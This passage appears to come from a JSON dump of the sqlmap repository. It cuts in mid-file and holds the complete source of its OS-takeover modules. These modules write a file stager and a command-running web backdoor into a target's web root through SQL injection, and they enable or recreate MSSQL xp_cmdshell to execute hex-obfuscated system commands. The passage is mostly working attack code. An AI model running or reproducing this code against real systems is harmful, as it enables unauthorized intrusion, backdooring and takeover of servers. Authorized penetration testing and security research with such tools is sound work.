%s) \" % defaultType\n\n            while True:\n                retType = readInput(msg, default=defaultType)\n\n                if hasattr(retType, \"isdigit\") and retType.isdigit():\n                    logger.warning(\"you need to specify the data-type of the return value\")\n                else:\n                    self.udfs[udfName][\"return\"] = retType\n                    break\n\n        success = self.udfInjectCore(self.udfs)\n\n        if success is False:\n            self.cleanup(udfDict=self.udfs)\n            return False\n\n        msg = \"do you want to call your injected user-defined \"\n        msg += \"functions now? [Y/n/q] \"\n        choice = readInput(msg, default='Y').upper()\n\n        if choice == 'N':\n            self.cleanup(udfDict=self.udfs)\n            return\n        elif choice == 'Q':\n            self.cleanup(udfDict=self.udfs)\n            raise SqlmapUserQuitException\n\n        while True:\n            udfList = []\n            msg = \"which UDF do you want to call?\"\n\n            for udf in self.udfs.keys():\n                udfList.append(udf)\n                msg += \"\\n[%d] %s\" % (len(udfList), udf)\n\n            msg += \"\\n[q] Quit\"\n\n            while True:\n                choice = readInput(msg).upper()\n\n                if choice == 'Q':\n                    break\n                elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList):\n                    choice = int(choice)\n                    break\n                else:\n                    warnMsg = \"invalid value, only digits >= 1 and \"\n                    warnMsg += \"<= %d are allowed\" % len(udfList)\n                    logger.warning(warnMsg)\n\n            if not isinstance(choice, int):\n                break\n\n            cmd = \"\"\n            count = 1\n            udfToCall = udfList[choice - 1]\n\n            for inp in self.udfs[udfToCall][\"input\"]:\n                msg = \"what is the value of the parameter number \"\n                msg += \"%d (data-type: %s)? \" % (count, inp)\n\n                while True:\n                    parValue = readInput(msg)\n\n                    if parValue:\n                        if \"int\" not in inp and \"bool\" not in inp:\n                            parValue = \"'%s'\" % parValue\n\n                        cmd += \"%s,\" % parValue\n\n                        break\n                    else:\n                        logger.warning(\"you need to specify the value of the parameter\")\n\n                count += 1\n\n            cmd = cmd[:-1]\n            msg = \"do you want to retrieve the return value of the \"\n            msg += \"UDF? [Y/n] \"\n\n            if readInput(msg, default='Y', boolean=True):\n                output = self.udfEvalCmd(cmd, udfName=udfToCall)\n\n                if output:\n                    conf.dumper.string(\"return value\", output)\n                else:\n                    dataToStdout(\"No return value\\n\")\n            else:\n                self.udfExecCmd(cmd, udfName=udfToCall, silent=True)\n\n            msg = \"do you want to call this or another injected UDF? [Y/n] \"\n\n            if not readInput(msg, default='Y', boolean=True):\n                break\n\n        self.cleanup(udfDict=self.udfs)\n"
  },
  {
    "path": "sqlmap/lib/takeover/web.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport io\nimport os\nimport posixpath\nimport re\nimport tempfile\n\nfrom extra.cloak.cloak import decloak\nfrom lib.core.agent import agent\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import Backend\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import getAutoDirectories\nfrom lib.core.common import getManualDirectories\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import getTechnique\nfrom lib.core.common import getTechniqueData\nfrom lib.core.common import isDigit\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import isWindowsDriveLetterPath\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import openFile\nfrom lib.core.common import parseFilePaths\nfrom lib.core.common import posixToNtSlashes\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeHex\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import OS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import WEB_PLATFORM\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT\nfrom lib.core.settings import EVENTVALIDATION_REGEX\nfrom lib.core.settings import SHELL_RUNCMD_EXE_TAG\nfrom lib.core.settings import SHELL_WRITABLE_DIR_TAG\nfrom lib.core.settings import VIEWSTATE_REGEX\nfrom lib.request.connect import Connect as Request\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass Web(object):\n    \"\"\"\n    This class defines web-oriented OS takeover functionalities for\n    plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.webPlatform = None\n        self.webBaseUrl = None\n        self.webBackdoorUrl = None\n        self.webBackdoorFilePath = None\n        self.webStagerUrl = None\n        self.webStagerFilePath = None\n        self.webDirectory = None\n\n    def webBackdoorRunCmd(self, cmd):\n        if self.webBackdoorUrl is None:\n            return\n\n        output = None\n\n        if not cmd:\n            cmd = conf.osCmd\n\n        cmdUrl = \"%s?cmd=%s\" % (self.webBackdoorUrl, getUnicode(cmd))\n        page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)\n\n        if page is not None:\n            output = re.search(r\"<pre>(.+?)</pre>\", page, re.I | re.S)\n\n            if output:\n                output = output.group(1)\n\n        return output\n\n    def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):\n        if filepath is not None:\n            if filepath.endswith('_'):\n                content = decloak(filepath)  # cloaked file\n            else:\n                with openFile(filepath, \"rb\", encoding=None) as f:\n                    content = f.read()\n\n        if content is not None:\n            stream = io.BytesIO(getBytes(content))  # string content\n\n            # Reference: https://github.com/sqlmapproject/sqlmap/issues/3560\n            # Reference: https://stackoverflow.com/a/4677542\n            stream.seek(0, os.SEEK_END)\n            stream.len = stream.tell()\n            stream.seek(0, os.SEEK_SET)\n\n        return self._webFileStreamUpload(stream, destFileName, directory)\n\n    def _webFileStreamUpload(self, stream, destFileName, directory):\n        stream.seek(0)  # Rewind\n\n        try:\n            setattr(stream, \"name\", destFileName)\n        except TypeError:\n            pass\n\n        if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True):\n            multipartParams = {\n                \"upload\": \"1\",\n                \"file\": stream,\n                \"uploadDir\": directory,\n            }\n\n            if self.webPlatform == WEB_PLATFORM.ASPX:\n                multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION\n                multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE\n\n            page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)\n\n            if \"File uploaded\" not in (page or \"\"):\n                warnMsg = \"unable to upload the file through the web file \"\n                warnMsg += \"stager to '%s'\" % directory\n                logger.warning(warnMsg)\n                return False\n            else:\n                return True\n        else:\n            logger.error(\"sqlmap hasn't got a web backdoor nor a web file stager for %s\" % self.webPlatform)\n            return False\n\n    def _webFileInject(self, fileContent, fileName, directory):\n        outFile = posixpath.join(ntToPosixSlashes(directory), fileName)\n        uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\\\\\') if Backend.isOs(OS.WINDOWS) else directory)\n        query = \"\"\n\n        if isTechniqueAvailable(getTechnique()):\n            where = getTechniqueData().where\n\n            if where == PAYLOAD.WHERE.NEGATIVE:\n                randInt = randomInt()\n                query += \"OR %d=%d \" % (randInt, randInt)\n\n        query += getSQLSnippet(DBMS.MYSQL, \"write_file_limit\", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False))\n        query = agent.prefixQuery(query)        # Note: No need for suffix as 'write_file_limit' already ends with comment (required)\n        payload = agent.payload(newValue=query)\n        page = Request.queryPage(payload)\n\n        return page\n\n    def webInit(self):\n        \"\"\"\n        This method is used to write a web backdoor (agent) on a writable\n        remote directory within the web server document root.\n        \"\"\"\n\n        if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None:\n            return\n\n        self.checkDbmsOs()\n\n        default = None\n        choices = list(getPublicTypeMembers(WEB_PLATFORM, True))\n\n        for ext in choices:\n            if conf.url.endswith(ext):\n                default = ext\n                break\n\n        if not default:\n            default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP\n\n        message = \"which web application language does the web server \"\n        message += \"support?\\n\"\n\n        for count in xrange(len(choices)):\n            ext = choices[count]\n            message += \"[%d] %s%s\\n\" % (count + 1, ext.upper(), (\" (default)\" if default == ext else \"\"))\n\n            if default == ext:\n                default = count + 1\n\n        message = message[:-1]\n\n        while True:\n            choice = readInput(message, default=str(default))\n\n            if not isDigit(choice):\n                logger.warning(\"invalid value, only digits are allowed\")\n\n            elif int(choice) < 1 or int(choice) > len(choices):\n                logger.warning(\"invalid value, it must be between 1 and %d\" % len(choices))\n\n            else:\n                self.webPlatform = choices[int(choice) - 1]\n                break\n\n        if not kb.absFilePaths:\n            message = \"do you want sqlmap to further try to \"\n            message += \"provoke the full path disclosure? [Y/n] \"\n\n            if readInput(message, default='Y', boolean=True):\n                headers = {}\n                been = set([conf.url])\n\n                for match in re.finditer(r\"=['\\\"]((https?):)?(//[^/'\\\"]+)?(/[\\w/.-]*)\\bwp-\", kb.originalPage or \"\", re.I):\n                    url = \"%s%s\" % (conf.url.replace(conf.path, match.group(4)), \"wp-content/wp-db.php\")\n                    if url not in been:\n                        try:\n                            page, _, _ = Request.getPage(url=url, raise404=False, silent=True)\n                            parseFilePaths(page)\n                        except:\n                            pass\n                        finally:\n                            been.add(url)\n\n                url = re.sub(r\"(\\.\\w+)\\Z\", r\"~\\g<1>\", conf.url)\n                if url not in been:\n                    try:\n                        page, _, _ = Request.getPage(url=url, raise404=False, silent=True)\n                        parseFilePaths(page)\n                    except:\n                        pass\n                    finally:\n                        been.add(url)\n\n                for place in (PLACE.GET, PLACE.POST):\n                    if place in conf.parameters:\n                        value = re.sub(r\"(\\A|&)(\\w+)=\", r\"\\g<2>[]=\", conf.parameters[place])\n                        if \"[]\" in value:\n                            page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)\n                            parseFilePaths(page)\n\n                cookie = None\n                if PLACE.COOKIE in conf.parameters:\n                    cookie = conf.parameters[PLACE.COOKIE]\n                elif headers and HTTP_HEADER.SET_COOKIE in headers:\n                    cookie = headers[HTTP_HEADER.SET_COOKIE]\n\n                if cookie:\n                    value = re.sub(r\"(\\A|;)(\\w+)=[^;]*\", r\"\\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\", cookie)\n                    if value != cookie:\n                        page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)\n                        parseFilePaths(page)\n\n                    value = re.sub(r\"(\\A|;)(\\w+)=[^;]*\", r\"\\g<2>=\", cookie)\n                    if value != cookie:\n                        page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)\n                        parseFilePaths(page)\n\n        directories = list(arrayizeValue(getManualDirectories()))\n        directories.extend(getAutoDirectories())\n        directories = list(OrderedSet(directories))\n\n        path = _urllib.parse.urlparse(conf.url).path or '/'\n        path = re.sub(r\"/[^/]*\\.\\w+\\Z\", '/', path)\n        if path != '/':\n            _ = []\n            for directory in directories:\n                _.append(directory)\n                if not directory.endswith(path):\n                    _.append(\"%s/%s\" % (directory.rstrip('/'), path.strip('/')))\n            directories = _\n\n        backdoorName = \"tmpb%s.%s\" % (randomStr(lowercase=True), self.webPlatform)\n        backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, \"backdoors\", \"backdoor.%s_\" % self.webPlatform)))\n\n        stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, \"stagers\", \"stager.%s_\" % self.webPlatform)))\n\n        for directory in directories:\n            if not directory:\n                continue\n\n            stagerName = \"tmpu%s.%s\" % (randomStr(lowercase=True), self.webPlatform)\n            self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)\n\n            uploaded = False\n            directory = ntToPosixSlashes(normalizePath(directory))\n\n            if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):\n                directory = \"/%s\" % directory\n\n            if not directory.endswith('/'):\n                directory += '/'\n\n            # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method\n            infoMsg = \"trying to upload the file stager on '%s' \" % directory\n            infoMsg += \"via LIMIT 'LINES TERMINATED BY' method\"\n            logger.info(infoMsg)\n            self._webFileInject(stagerContent, stagerName, directory)\n\n            for match in re.finditer('/', directory):\n                self.webBaseUrl = \"%s://%s:%d%s/\" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))\n                self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)\n                debugMsg = \"trying to see if the file is accessible from '%s'\" % self.webStagerUrl\n                logger.debug(debugMsg)\n\n                uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)\n                uplPage = uplPage or \"\"\n\n                if \"sqlmap file uploader\" in uplPage:\n                    uploaded = True\n                    break\n\n            # Fall-back to UNION queries file upload method\n            if not uploaded:\n                warnMsg = \"unable to upload the file stager \"\n                warnMsg += \"on '%s'\" % directory\n                singleTimeWarnMessage(warnMsg)\n\n                if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):\n                    infoMsg = \"trying to upload the file stager on '%s' \" % directory\n                    infoMsg += \"via UNION method\"\n                    logger.info(infoMsg)\n\n                    stagerName = \"tmpu%s.%s\" % (randomStr(lowercase=True), self.webPlatform)\n                    self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)\n\n                    handle, filename = tempfile.mkstemp()\n                    os.close(handle)\n\n                    with openFile(filename, \"w+b\") as f:\n                        _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, \"stagers\", \"stager.%s_\" % self.webPlatform)))\n                        _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\\\\\') if Backend.isOs(OS.WINDOWS) else directory)\n                        f.write(_)\n\n                    self.unionWriteFile(filename, self.webStagerFilePath, \"text\", forceCheck=True)\n\n                    for match in re.finditer('/', directory):\n                        self.webBaseUrl = \"%s://%s:%d%s/\" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))\n                        self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)\n\n                        debugMsg = \"trying to see if the file is accessible from '%s'\" % self.webStagerUrl\n                        logger.debug(debugMsg)\n\n                        uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)\n                        uplPage = uplPage or \"\"\n\n                        if \"sqlmap file uploader\" in uplPage:\n                            uploaded = True\n                            break\n\n            if not uploaded:\n                continue\n\n            if \"<%\" in uplPage or \"<?\" in uplPage:\n                warnMsg = \"file stager uploaded on '%s', \" % directory\n                warnMsg += \"but not dynamically interpreted\"\n                logger.warning(warnMsg)\n                continue\n\n            elif self.webPlatform == WEB_PLATFORM.ASPX:\n                kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)\n                kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)\n\n            infoMsg = \"the file stager has been successfully uploaded \"\n            infoMsg += \"on '%s' - %s\" % (directory, self.webStagerUrl)\n            logger.info(infoMsg)\n\n            if self.webPlatform == WEB_PLATFORM.ASP:\n                match = re.search(r'input type=hidden name=scriptsdir value=\"([^\"]+)\"', uplPage)\n\n                if match:\n                    backdoorDirectory = match.group(1)\n                else:\n                    continue\n\n                _ = \"tmpe%s.exe\" % randomStr(lowercase=True)\n                if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)):\n                    self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, \"runcmd\", \"runcmd.exe_\"))\n                    self.webBackdoorUrl = \"%s/Scripts/%s\" % (self.webBaseUrl, backdoorName)\n                    self.webDirectory = backdoorDirectory\n                else:\n                    continue\n\n            else:\n                if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):\n                    warnMsg = \"backdoor has not been successfully uploaded \"\n                    warnMsg += \"through the file stager possibly because \"\n                    warnMsg += \"the user running the web server process \"\n                    warnMsg += \"has not write privileges over the folder \"\n                    warnMsg += \"where the user running the DBMS process \"\n                    warnMsg += \"was able to upload the file stager or \"\n                    warnMsg += \"because the DBMS and web server sit on \"\n                    warnMsg += \"different servers\"\n                    logger.warning(warnMsg)\n\n                    message = \"do you want to try the same method used \"\n                    message += \"for the file stager? [Y/n] \"\n\n                    if readInput(message, default='Y', boolean=True):\n                        self._webFileInject(backdoorContent, backdoorName, directory)\n                    else:\n                        continue\n\n                self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)\n                self.webDirectory = directory\n\n            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)\n\n            testStr = \"command execution test\"\n            output = self.webBackdoorRunCmd(\"echo %s\" % testStr)\n\n            if output == \"0\":\n                warnMsg = \"the backdoor has been uploaded but required privileges \"\n                warnMsg += \"for running the system commands are missing\"\n                raise SqlmapNoneDataException(warnMsg)\n            elif output and testStr in output:\n                infoMsg = \"the backdoor has been successfully \"\n            else:\n                infoMsg = \"the backdoor has probably been successfully \"\n\n            infoMsg += \"uploaded on '%s' - \" % self.webDirectory\n            infoMsg += self.webBackdoorUrl\n            logger.info(infoMsg)\n\n            break\n"
  },
  {
    "path": "sqlmap/lib/takeover/xp_cmdshell.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import flattenValue\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import wasLastResponseDelayed\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeHex\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.request import inject\n\nclass XP_cmdshell(object):\n    \"\"\"\n    This class defines methods to deal with Microsoft SQL Server\n    xp_cmdshell extended procedure for plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.xpCmdshellStr = \"master..xp_cmdshell\"\n\n    def _xpCmdshellCreate(self):\n        cmd = \"\"\n\n        if not Backend.isVersionWithin((\"2000\",)):\n            logger.debug(\"activating sp_OACreate\")\n\n            cmd = getSQLSnippet(DBMS.MSSQL, \"activate_sp_oacreate\")\n            inject.goStacked(agent.runAsDBMSUser(cmd))\n\n        self._randStr = randomStr(lowercase=True)\n        self.xpCmdshellStr = \"master..new_xp_cmdshell\"\n\n        cmd = getSQLSnippet(DBMS.MSSQL, \"create_new_xp_cmdshell\", RANDSTR=self._randStr)\n\n        if not Backend.isVersionWithin((\"2000\",)):\n            cmd += \";RECONFIGURE WITH OVERRIDE\"\n\n        inject.goStacked(agent.runAsDBMSUser(cmd))\n\n    def _xpCmdshellConfigure2005(self, mode):\n        debugMsg = \"configuring xp_cmdshell using sp_configure \"\n        debugMsg += \"stored procedure\"\n        logger.debug(debugMsg)\n\n        cmd = getSQLSnippet(DBMS.MSSQL, \"configure_xp_cmdshell\", ENABLE=str(mode))\n\n        return cmd\n\n    def _xpCmdshellConfigure2000(self, mode):\n        debugMsg = \"configuring xp_cmdshell using sp_addextendedproc \"\n        debugMsg += \"stored procedure\"\n        logger.debug(debugMsg)\n\n        if mode == 1:\n            cmd = getSQLSnippet(DBMS.MSSQL, \"enable_xp_cmdshell_2000\", ENABLE=str(mode))\n        else:\n            cmd = getSQLSnippet(DBMS.MSSQL, \"disable_xp_cmdshell_2000\", ENABLE=str(mode))\n\n        return cmd\n\n    def _xpCmdshellConfigure(self, mode):\n        if Backend.isVersionWithin((\"2000\",)):\n            cmd = self._xpCmdshellConfigure2000(mode)\n        else:\n            cmd = self._xpCmdshellConfigure2005(mode)\n\n        inject.goStacked(agent.runAsDBMSUser(cmd))\n\n    def _xpCmdshellCheck(self):\n        cmd = \"ping -n %d 127.0.0.1\" % (conf.timeSec * 2)\n        self.xpCmdshellExecCmd(cmd)\n\n        return wasLastResponseDelayed()\n\n    @stackedmethod\n    def _xpCmdshellTest(self):\n        threadData = getCurrentThreadData()\n        pushValue(threadData.disableStdOut)\n        threadData.disableStdOut = True\n\n        logger.info(\"testing if xp_cmdshell extended procedure is usable\")\n        output = self.xpCmdshellEvalCmd(\"echo 1\")\n\n        if output == \"1\":\n            logger.info(\"xp_cmdshell extended procedure is usable\")\n        elif isNoneValue(output) and conf.dbmsCred:\n            errMsg = \"it seems that the temporary directory ('%s') used for \" % self.getRemoteTempPath()\n            errMsg += \"storing console output within the back-end file system \"\n            errMsg += \"does not have writing permissions for the DBMS process. \"\n            errMsg += \"You are advised to manually adjust it with option \"\n            errMsg += \"'--tmp-path' or you won't be able to retrieve \"\n            errMsg += \"the command(s) output\"\n            logger.error(errMsg)\n        elif isNoneValue(output):\n            logger.error(\"unable to retrieve xp_cmdshell output\")\n        else:\n            logger.info(\"xp_cmdshell extended procedure is usable\")\n\n        threadData.disableStdOut = popValue()\n\n    def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):\n        echoedLines = []\n        cmd = \"\"\n        charCounter = 0\n        maxLen = 512\n\n        if isinstance(fileContent, (set, list, tuple)):\n            lines = fileContent\n        else:\n            lines = fileContent.split(\"\\n\")\n\n        for line in lines:\n            echoedLine = \"echo %s \" % line\n            echoedLine += \">> \\\"%s\\\\%s\\\"\" % (tmpPath, randDestFile)\n            echoedLines.append(echoedLine)\n\n        for echoedLine in echoedLines:\n            cmd += \"%s & \" % echoedLine\n            charCounter += len(echoedLine)\n\n            if charCounter >= maxLen:\n                self.xpCmdshellExecCmd(cmd.rstrip(\" & \"))\n\n                cmd = \"\"\n                charCounter = 0\n\n        if cmd:\n            self.xpCmdshellExecCmd(cmd.rstrip(\" & \"))\n\n    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):\n        # When user provides DBMS credentials (with --dbms-cred) we need to\n        # redirect the command standard output to a temporary file in order\n        # to retrieve it afterwards\n        # NOTE: this does not need to be done when the command is 'del' to\n        # delete the temporary file\n        if conf.dbmsCred and insertIntoTable:\n            self.tmpFile = \"%s/tmpc%s.txt\" % (conf.tmpPath, randomStr(lowercase=True))\n            cmd = \"%s > \\\"%s\\\"\" % (cmd, self.tmpFile)\n\n        # Obfuscate the command to execute, also useful to bypass filters\n        # on single-quotes\n        self._randStr = randomStr(lowercase=True)\n        self._forgedCmd = \"DECLARE @%s VARCHAR(8000);\" % self._randStr\n\n        try:\n            self._forgedCmd += \"SET @%s=%s;\" % (self._randStr, \"0x%s\" % encodeHex(cmd, binary=False))\n        except UnicodeError:\n            self._forgedCmd += \"SET @%s='%s';\" % (self._randStr, cmd)\n\n        # Insert the command standard output into a support table,\n        # 'sqlmapoutput', except when DBMS credentials are provided because\n        # it does not work unfortunately, BULK INSERT needs to be used to\n        # retrieve the output when OPENROWSET is used hence the redirection\n        # to a temporary file from above\n        if insertIntoTable and not conf.dbmsCred:\n            self._forgedCmd += \"INSERT INTO %s(data) \" % insertIntoTable\n\n        self._forgedCmd += \"EXEC %s @%s\" % (self.xpCmdshellStr, self._randStr)\n\n        return agent.runAsDBMSUser(self._forgedCmd)\n\n    def xpCmdshellExecCmd(self, cmd, silent=False):\n        return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent)\n\n    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):\n        output = None\n\n        if conf.direct:\n            output = self.xpCmdshellExecCmd(cmd)\n\n            if output and isinstance(output, (list, tuple)):\n                new_output = \"\"\n\n                for line in output:\n                    if line == \"NULL\":\n                        new_output += \"\\n\"\n                    else:\n                        new_output += \"%s\\n\" % line.strip(\"\\r\")\n\n                output = new_output\n        else:\n            inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))\n\n            # When user provides DBMS credentials (with --dbms-cred), the\n            # command standard output is redirected to a temporary file\n            # The file needs to be copied to the support table,\n            # 'sqlmapoutput'\n            if conf.dbmsCred:\n                inject.goStacked(\"BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')\" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))\n                self.delRemoteFile(self.tmpFile)\n\n            query = \"SELECT %s FROM %s ORDER BY id\" % (self.tblField, self.cmdTblName)\n\n            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                output = inject.getValue(query, resumeValue=False, blind=False, time=False)\n\n            if (output is None) or len(output) == 0 or output[0] is None:\n                output = []\n                count = inject.getValue(\"SELECT COUNT(id) FROM %s\" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                if isNumPosStrValue(count):\n                    for index in getLimitRange(count):\n                        query = agent.limitQuery(index, query, self.tblField)\n                        output.append(inject.getValue(query, union=False, error=False, resumeValue=False))\n\n            inject.goStacked(\"DELETE FROM %s\" % self.cmdTblName)\n\n            if output and isListLike(output) and len(output) > 1:\n                _ = \"\"\n                lines = [line for line in flattenValue(output) if line is not None]\n\n                for i in xrange(len(lines)):\n                    line = lines[i] or \"\"\n                    if line is None or i in (0, len(lines) - 1) and not line.strip():\n                        continue\n                    _ += \"%s\\n\" % line\n\n                output = _.rstrip('\\n')\n\n        return output\n\n    def xpCmdshellInit(self):\n        if not kb.xpCmdshellAvailable:\n            infoMsg = \"checking if xp_cmdshell extended procedure is \"\n            infoMsg += \"available, please wait..\"\n            logger.info(infoMsg)\n\n            result = self._xpCmdshellCheck()\n\n            if result:\n                logger.info(\"xp_cmdshell extended procedure is available\")\n                kb.xpCmdshellAvailable = True\n\n            else:\n                message = \"xp_cmdshell extended procedure does not seem to \"\n                message += \"be available. Do you want sqlmap to try to \"\n                message += \"re-enable it? [Y/n] \"\n\n                if readInput(message, default='Y', boolean=True):\n                    self._xpCmdshellConfigure(1)\n\n                    if self._xpCmdshellCheck():\n                        logger.info(\"xp_cmdshell re-enabled successfully\")\n                        kb.xpCmdshellAvailable = True\n\n                    else:\n                        logger.warning(\"xp_cmdshell re-enabling failed\")\n\n                        logger.info(\"creating xp_cmdshell with sp_OACreate\")\n                        self._xpCmdshellConfigure(0)\n                        self._xpCmdshellCreate()\n\n                        if self._xpCmdshellCheck():\n                            logger.info(\"xp_cmdshell created successfully\")\n                            kb.xpCmdshellAvailable = True\n\n                        else:\n                            warnMsg = \"xp_cmdshell creation failed, probably \"\n                            warnMsg += \"because sp_OACreate is disabled\"\n                            logger.warning(warnMsg)\n\n            hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable)\n\n            if not kb.xpCmdshellAvailable:\n                errMsg = \"unable to proceed without xp_cmdshell\"\n                raise SqlmapUnsupportedFeatureException(errMsg)\n\n        debugMsg = \"creating a support table to write commands standard \"\n        debugMsg += \"output to\"\n        logger.debug(debugMsg)\n\n        # TEXT can't be used here because in error technique you get:\n        # \"The text, ntext, and image data types cannot be compared or sorted\"\n        self.createSupportTbl(self.cmdTblName, self.tblField, \"NVARCHAR(4000)\")\n\n        self._xpCmdshellTest()\n"
  },
  {
    "path": "sqlmap/lib/techniques/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/techniques/blind/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/techniques/blind/inference.py",
